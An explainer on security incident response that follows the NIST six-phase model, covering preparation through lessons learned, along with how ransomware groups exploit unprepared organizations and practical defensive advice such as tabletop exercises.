You don’t rise to the occasion. You fall to the level of your preparation. Every military strategist, every firefighter, every trauma surgeon knows this — and every security team learns it the hard way at 2 AM on a Saturday when the SIEM lights up like a Christmas tree and nobody can find the runbook.
Incident response isn’t a product you buy. It’s a muscle you build. And if you haven’t exercised it before the breach, you’re not responding — you’re improvising. That’s a bad look when the board is asking questions and the attackers are already on day 47 inside your network.
The TLDR
Every organization will face a security incident. The difference between a contained event and a catastrophic breach is whether you had a plan, practiced it, and actually followed it when the adrenaline hit. The six phases of incident response — preparation, identification, containment, eradication, recovery, and lessons learned — aren’t optional steps. They’re the difference between “we handled it” and “we’re on the news.”
The Reality
Here’s the uncomfortable math. According to the Verizon DBIR and IBM Cost of a Data Breach Report, the average dwell time — that’s how long an attacker lives inside your network before anyone notices — is still north of 200 days. Two hundred days. They’re reading your email, mapping your infrastructure, exfiltrating your data, and you’re wondering why the file server is a little slow on Thursdays.
Worse: most organizations don’t discover breaches themselves. They find out from law enforcement, a journalist, or a customer who noticed their credit card got used in three countries simultaneously. The call is coming from outside the house. It usually is.
The first hour of an incident matters more than any hour that follows. And most teams waste it. They waste it panicking, arguing about who has authority to shut down a server, trying to find a phone number for legal counsel, and — this is the classic — accidentally destroying forensic evidence by rebooting compromised machines. The attacker planned their operation for weeks. You’re running yours in real-time with no script. That’s not a fair fight.
How It Works
The gold standard is NIST SP 800-61r2 — Computer Security Incident Handling Guide. It lays out six phases, and each one matters. Skip one, and the whole thing falls apart.
Phase 1: Preparation
This is the phase that happens before anything goes wrong — which is exactly why most organizations skip it. Preparation means having written policies, a defined incident response team with clear roles, communication plans (internal and external), pre-arranged legal counsel, and pre-negotiated contracts with forensic firms. You don’t want to be Googling “digital forensics near me” during an active breach.
It also means tooling. Do you have centralized logging? Can you actually isolate a compromised endpoint without taking down half the network? Is your backup strategy tested, or just theoretically sound? CISA publishes regular advisories — are you reading them, or are they going to an inbox nobody checks?
Phase 2: Identification
Something looks wrong. Maybe your SIEM fired an alert. Maybe EDR flagged a suspicious process. Maybe someone in accounting got a weird email and — credit to them — actually reported it instead of clicking the link. Detection sources include SIEM correlation rules, EDR telemetry, threat intelligence feeds, network anomaly detection, and good old-fashioned human intuition.
Triage is critical here. Not every alert is an incident, and not every incident is a crisis. You need severity classification criteria defined in advance. Is this a commodity malware infection on a single workstation, or is this lateral movement from a compromised domain admin account? The response looks very different. Map what you’re seeing to MITRE ATT&CK techniques — it tells you where the attacker might be in their kill chain and what’s likely coming next.
Phase 3: Containment
Now you know it’s real. The instinct is to pull the plug — yank the network cable, shut everything down, salt the earth. Sometimes that’s correct. Usually it’s not. Containment has two modes: short-term and long-term. Short-term containment means isolating the affected systems to stop the bleeding — network segmentation, disabling compromised accounts, blocking known-bad IPs. Long-term containment means standing up clean parallel systems while you figure out the full scope.
Here’s the critical part most people botch: evidence preservation. The moment you reboot that compromised server, you lose volatile memory — running processes, network connections, loaded modules. That’s forensic gold, and it’s gone. Capture memory images first. Image the disk. Document everything. Chain of custody matters, especially if this ends up in court or you need to file with CISA under federal incident reporting requirements.
Phase 4: Eradication
You’ve stopped the bleeding. Now find the bullet. Root cause analysis means understanding exactly how the attacker got in, what they did, and what persistence mechanisms they left behind. Backdoor accounts, scheduled tasks, modified startup scripts, web shells — attackers don’t break in once and hope for the best. They plant insurance. Reference MITRE ATT&CK Persistence techniques (TA0003) for the full catalog of ways they stay.
Patch the entry vector. If it was a phishing email that delivered a payload exploiting an unpatched vulnerability, patch the vuln, retrain the people, and add detection rules for the specific TTP used. If you don’t eradicate the root cause, you’re just resetting a timer.
Phase 5: Recovery
Restoration from known-clean backups. Not “probably clean.” Known-clean. If your backups were accessible from the compromised network — and they often are — you need to verify their integrity before you trust them. Attackers increasingly target backup infrastructure specifically because they know it’s your escape hatch.
Recovery is phased. You don’t flip everything back on at once. Bring systems back in priority order, monitor aggressively for signs of re-compromise, and validate that your eradication was actually complete. NIST SP 800-184 covers cyber event recovery in detail.
Phase 6: Lessons Learned
The blameless postmortem. What happened, when, how did the team respond, what worked, what didn’t, and what changes need to be made. This isn’t a witch hunt — it’s a calibration session. Update your playbooks. Update your detection rules. Update your preparation phase. The whole cycle feeds back into itself.
Organizations that skip this phase are doomed to have the same incident twice. That’s not bad luck. That’s negligence.
How It Gets Exploited
Ransomware groups specifically target organizations without IR plans. They know that a panicked team with no playbook is more likely to pay. Double extortion — encrypt the data AND threaten to leak it — works because organizations without incident response plans also tend to lack the communication strategy needed to manage a public disclosure.
Timing is deliberate. Major ransomware deployments disproportionately hit on Friday evenings, holiday weekends, and during corporate transitions (mergers, layoffs, leadership changes). The attacker wants maximum dwell time before anyone competent notices. CISA’s advisory on holiday-timed attacks has documented this pattern repeatedly.
The usual suspects also know that most organizations will panic-destroy evidence. They’re counting on it. A company that wipes and reimages everything in a frenzy has just eliminated any chance of understanding the full scope, identifying all compromised accounts, or building a legal case.
What You Can Do
Build a minimal IR plan. It doesn’t need to be a 200-page document. It needs to answer: who’s on the team, how do you reach them at 3 AM, who has authority to isolate systems, who calls legal, who talks to the press, and where are the runbooks? Write it down. Print it out. Put a copy somewhere that isn’t on the network that might be compromised.
Run tabletop exercises. Quarterly at minimum. Sit the team down and walk through scenarios. “We just got alerted that a domain admin account is authenticating from an IP in a country we don’t operate in. What do we do?” If the answer involves uncomfortable silence and people looking at their phones, you have work to do.
Establish relationships with legal counsel and a forensic firm before you need them. Retainers exist for a reason. The time to negotiate a contract is not during an active breach.
And for the love of everything: don’t pay the ransom without consulting legal counsel first. There are OFAC implications, potential sanctions violations, and zero guarantee you’ll get your data back. The FBI IC3 wants to hear from you. Let them.
Related Deep Dives
- SOC Operations — the team that detects incidents before they escalate